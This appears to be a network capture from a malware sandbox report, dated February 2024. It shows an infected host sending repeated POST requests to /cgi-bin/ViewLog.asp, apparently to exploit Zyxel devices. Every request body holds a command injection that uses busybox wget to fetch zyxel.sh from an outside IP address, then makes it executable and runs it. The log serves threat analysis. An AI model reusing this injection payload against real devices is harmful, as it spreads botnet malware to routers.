                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 71 75 65 73 74 20 64 65 6e 69 65 64 20 62 79 20 57 61 74 63 68 47 75 61 72 64 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 20 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 56 65 72 64 61 6e 61 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 64 69 76 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 2e 62 6f 78 20 7b 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 32 46 32 46 32 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 43 32 43 32 43 32 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 43 32 43 32 43 32 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 31 30 70 78 20 32 30 70 78 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 2e 72 65 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 52 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 2e 62 61 6e 64 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 57 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 33 33 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 6c 65 66
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Request denied by WatchGuard HTTP Proxy</title> <style type="text/css"> body { font-family: Arial, Helvetica, Verdana, Sans-Serif; font-size: small; font-weight: normal; color: #000000; } div { margin-left: auto; margin-right: auto; text-align: center; } .box { width: 600px; background-color: #F2F2F2; border-left: solid 1px #C2C2C2; border-right: solid 1px #C2C2C2; vertical-align: middle; padding: 20px 10px 20px 10px; } p { text-align: left; } .red { font-weight: bold; color: Red; text-align: center; } .band { height: 20px; color: White; background: #333333; width: 600px; border-lef


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1008192.168.2.145712895.163.215.1648080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.555856943 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1009192.168.2.145365694.123.122.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.605806112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1010192.168.2.144143294.121.26.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.605992079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1011192.168.2.143710494.123.153.1708080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.606161118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1012192.168.2.144279694.123.181.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:14.606375933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1013192.168.2.145797231.33.141.248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.099519014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.115678072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1014192.168.2.143334231.136.246.988080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.099572897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.115653038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.259428024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:36.290879011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.121965885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1015192.168.2.144738885.98.93.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.124252081 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:15.366170883 CET548INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:14 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1016192.168.2.144305294.120.156.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.131375074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1017192.168.2.144995231.136.59.1588080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.528203964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:16.167651892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:17.411617041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:19.907551050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.027298927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.010895014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:54.978079081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1018192.168.2.145641431.200.24.758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.619203091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1019192.168.2.145025694.120.236.2428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.619698048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1020192.168.2.144380031.200.89.128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.620997906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
